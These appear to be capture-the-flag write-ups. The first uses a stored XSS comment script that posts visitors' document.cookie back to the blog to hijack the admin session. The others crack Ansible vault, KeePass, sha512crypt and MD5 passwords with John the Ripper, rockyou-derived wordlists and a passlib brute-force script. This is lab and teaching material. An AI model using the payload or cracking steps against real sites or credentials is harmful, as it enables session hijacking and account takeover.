We've built a new blog app!
Can you get the flag from the admin user? He's logged on right now
I don't have access to the instance anymore since the CTF has been paused, but I will try to explain the steps.
After looking around we see a comment box that supports markdown, which we can exploit. We need to get the admin's cookie to get the admin's session. I made the following script:
<script>
fetch('http://blog.com:5000/new-comment', {
    method: 'POST',
    headers: {
        'Cookie': document.cookie,
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: new URLSearchParams({
        'name': 'cookie grab',
        'comment': document.cookie
    })
})
</script>
You need to make a comment that has this script in it; the script will automatically load whenever someone loads the page with the comments. The script will make a POST request simulating that the person has made a comment, and then make the comment text contain their cookie. There will be a lot of cookies, so you might have to try some different ones; for me the second comment cookie worked, and when pressing the admin button on the top left side of the page, you are greeted with the flag.
The flag is the password for this vault.
John the Ripper has a tool for making john-compatible hashes from Ansible vault files, but it isn't a standard command; you will need to run the Python file directly. Use the command below, depending on where your john source files are placed:
python /usr/share/john/ansible2john.py supersecrets.yml > ansiblehash.txt
If you somehow can't find the john files, you can download the ansible2john.py file from here.
This will make a john-compatible password hash from the Ansible vault file and output it into ansiblehash.txt.
Now we can run john to bruteforce the password:
john --wordlist=new_rockyou.txt ansiblehash.txt
The new_rockyou.txt wordlist is from the Password Cracking 2 writeup, check it out.
When john is done, you should have gotten the password zebracrossing.
The flag is the password for this vault.
For this challenge we will be using John the Ripper to crack the password hash. First we need to obtain the password hash. We need to use keepass2john to make a john-compatible hash. We use the command below.
keepass2john keepass.kdbx > keepasshash.txt
This command takes the password hash and then outputs it into the keepasshash.txt file.
Now we can bruteforce the password with john using the command below:
john --wordlist=/usr/share/wordlists/rockyou.txt keepasshash.txt
Replace the wordlist path if yours is placed somewhere else.
Now this is going to take a lot of time. But once we have cracked one password challenge, we can crack the others faster.
When john has found the password, we can see that it's zebracakes, and that's the flag.
Now keep in mind that the password included "zebra", which is also the logo of Punk Security. This might mean that we can make a new password list with only the entries in rockyou.txt that include "zebra". To make this list, I made a quick Python script:
with open("rockyou.txt", "r", errors="ignore") as f:
    passwords = [pw.strip() for pw in f.readlines()]

new_passwords = []
for password in passwords:
    if "zebra" in password.lower():
        new_passwords.append(password)

with open("new_rockyou.txt", "w") as f:
    f.write("\n".join(new_passwords))
This will make a new_rockyou.txt file with only the entries from the original rockyou.txt list that include "zebra".
You can also download it here if you want to.
$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0
The flag is the password corresponding with this hash.
For this challenge I first needed to find out what type of hash that was, so I used hashes.com/en/tools/hash_identifier to identify the hash type. It came back as sha512crypt $6$, so I googled that. I found this page that explained it quite well. We can split the hash into three parts: the hash method, the salt and the hash. I made a Python script to crack the password for this one using Python's passlib.hash library. I have split the hash into the salt and the hash, because the hash type is not really needed when we know that we need to use sha512. Also, I didn't know the amount of rounds the hash went through, so just to be sure, I made it go from 1,000 to 10,000 rounds.
Read Password Cracking 2 to see what new_rockyou.txt is.
from passlib.hash import sha512_crypt

salt = "XM4TZ5vb6W/0SjIl"
hashed_flag = "PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"
# The complete hash, kept for reference.
full_hash = "$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"

with open("new_rockyou.txt", "r", errors="ignore") as f:
    passwords = [pw.strip() for pw in f.readlines()]

# Try 1,000 to 10,000 rounds in steps of 1,000.
for n in range(1, 11):
    n = n * 1000
    print("Rounds:", n)
    for password in passwords:
        h = sha512_crypt.using(salt=salt, rounds=n).hash(password)
        # Compare only the checksum part: for any round count other than the
        # default 5000, passlib embeds "rounds=n$" in the output string, so a
        # comparison against full_hash could never match.
        if h.split("$")[-1] == hashed_flag:
            print(password)
            exit(0)
When running the script, it tries to go through our wordlist and hashes with the salt. If the new hash matches the full hash, then it prints the flag and exits the script.
From the run we see that the amount of rounds is 5,000 and the password is zebrasrule.
fd217a229b674ae4bcb82a0bb4751e11
The flag is the password corresponding with this hash.
This one was pretty easy. I usually run hashes through hashes.com/en/tools/hash_identifier to identify hashes, and right away it sees that it's an MD5 hash and shows the password: 16drunkzebras.